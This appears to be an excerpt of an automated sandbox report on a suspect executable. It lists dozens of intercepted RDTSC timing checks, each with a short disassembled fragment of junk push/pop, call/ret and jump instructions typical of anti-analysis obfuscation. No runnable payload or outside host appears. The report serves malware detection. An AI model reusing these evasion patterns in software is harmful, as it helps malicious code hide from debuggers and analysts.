                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DF23 second address: D2DF27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DF27 second address: D2DF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E7CC second address: D2E7D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F4BA second address: D2F4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F235 second address: D2F23F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44DA3FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F4BE second address: D2F4C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F23F second address: D2F254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F0C44DA3FECh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31CE3 second address: D31CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32263 second address: D32267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3341A second address: D3341E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D323C4 second address: D323C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36596 second address: D365A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44EBA8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D365A0 second address: D365B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44DA3FECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36694 second address: D36698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39621 second address: D39626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38759 second address: D3877B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F0C44EBA8ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44EBA8ECh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A56C second address: D3A5F6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F0C44DA3FECh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0C44DA3FE8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D5570h], ecx 0x00000032 movsx edi, cx 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+12454724h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F0C44DA3FE8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 or dword ptr [ebp+122D1ED9h], esi 0x0000005f xchg eax, esi 0x00000060 ja 00007F0C44DA3FEEh 0x00000066 push eax 0x00000067 jns 00007F0C44DA3FF0h 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D71B second address: D3D71F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D71F second address: D3D725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E883 second address: D3E8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F0C44EBA8E8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+12481329h], esi 0x00000027 stc 0x00000028 push 00000000h 0x0000002a clc 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e clc 0x0000002f mov al, F0h 0x00000031 popad 0x00000032 jmp 00007F0C44EBA8F6h 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e popad 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F6D7 second address: D3F6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E9DC second address: D3E9E6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44EBA8ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F6DB second address: D3F756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jno 00007F0C44DA3FEEh 0x0000000e nop 0x0000000f mov bl, 79h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0C44DA3FE8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D197Ah] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F0C44DA3FE8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f sbb edi, 52B9FFFCh 0x00000055 push ebx 0x00000056 add dword ptr [ebp+122D31F7h], edx 0x0000005c pop edi 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 jo 00007F0C44DA3FE6h 0x00000067 pop edi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3E9E6 second address: D3EA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F0C44EBA8E8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+124548CBh], edi 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0C44EBA8E8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a add dword ptr [ebp+124548EFh], eax 0x00000050 xor ebx, 7CFDB097h 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d mov edi, 2213F2D0h 0x00000062 mov eax, dword ptr [ebp+122D0A19h] 0x00000068 push esi 0x00000069 xor bh, FFFFFFB2h 0x0000006c pop ebx 0x0000006d push FFFFFFFFh 0x0000006f mov dword ptr [ebp+122D2B25h], eax 0x00000075 push eax 0x00000076 pushad 0x00000077 jns 00007F0C44EBA8FFh 0x0000007d jmp 00007F0C44EBA8F9h 0x00000082 push eax 0x00000083 push edx 0x00000084 push edi 0x00000085 pop edi 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F756 second address: D3F75B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40587 second address: D405CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+12480A46h], esi 0x0000000d push 00000000h 0x0000000f call 00007F0C44EBA8EFh 0x00000014 add ebx, 11AD26F5h 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d xor edi, dword ptr [ebp+122D371Ah] 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 jmp 00007F0C44EBA8F0h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D405CA second address: D405CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F899 second address: D3F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F89D second address: D3F8CB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44DA3FFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F0C44DA3FF4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F8CB second address: D3F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D419BE second address: D419C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE2A51 second address: CE2A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48ED7 second address: D48F1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0C44DA3FF6h 0x0000000a jmp 00007F0C44DA3FF5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0C44DA3FECh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F1D second address: D48F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F21 second address: D48F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D490A7 second address: D490E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0C44EBA8F6h 0x00000008 jmp 00007F0C44EBA8EFh 0x0000000d pop esi 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F0C44EBA8EFh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AEC4 second address: D4AEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AEC8 second address: D4AECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AECE second address: D4AF19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44DA3FFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44DA3FF1h 0x00000012 jmp 00007F0C44DA3FF7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AF19 second address: D4AF4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F0C44EBA8F2h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F0C44EBA8E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDF3B3 second address: CDF3D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF5h 0x00000007 jmp 00007F0C44DA3FEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EEFF second address: D4EF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8EBh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F87C second address: D4F887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0C44DA3FE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F887 second address: D4F88E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55741 second address: D5575F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F0C44DA400Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5575F second address: D55763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55763 second address: D5577D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55FCE second address: D55FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5627B second address: D5628A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56512 second address: D56517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63871 second address: D6387B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D626E1 second address: D626EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0C44EBA8E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6292A second address: D62930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D62930 second address: D6296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0C44EBA904h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F0C44EBA8E6h 0x00000017 jno 00007F0C44EBA8E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6296B second address: D62977 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44DA3FE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D62977 second address: D629A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0C44EBA8F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D631A8 second address: D631B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44DA3FE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D631B7 second address: D631BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D631BC second address: D631C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D631C4 second address: D631C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D680DF second address: D680E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D683B6 second address: D683C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D683C0 second address: D68400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0C44DA3FF8h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0C44DA3FECh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68400 second address: D6841D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68843 second address: D68849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68AC7 second address: D68ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68ACD second address: D68AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68AD2 second address: D68ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68ADB second address: D68AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F0C44DA3FE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68AE9 second address: D68AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C2C second address: D68C58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0C44DA3FF1h 0x00000008 pop esi 0x00000009 jmp 00007F0C44DA3FF0h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C58 second address: D68C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C5C second address: D68C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C62 second address: D68C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C6C second address: D68C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C70 second address: D68C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68C74 second address: D68C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jp 00007F0C44DA3FE6h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68E01 second address: D68E1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0C44EBA8ECh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68E1B second address: D68E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF7h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0C44DA3FF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68E50 second address: D68E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68E55 second address: D68E71 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C44DA3FECh 0x00000008 jl 00007F0C44DA3FE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F0C44DA3FE6h 0x00000016 ja 00007F0C44DA3FE6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68FD0 second address: D68FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68FD7 second address: D68FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA3F3 second address: CDA408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44EBA8EDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA408 second address: CDA412 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44DA3FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA412 second address: CDA418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA418 second address: CDA437 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44DA3FE8h 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44DA3FEDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA437 second address: CDA43C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA43C second address: CDA44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F0C44DA3FE6h 0x0000000d jne 00007F0C44DA3FE6h 0x00000013 rdtsc
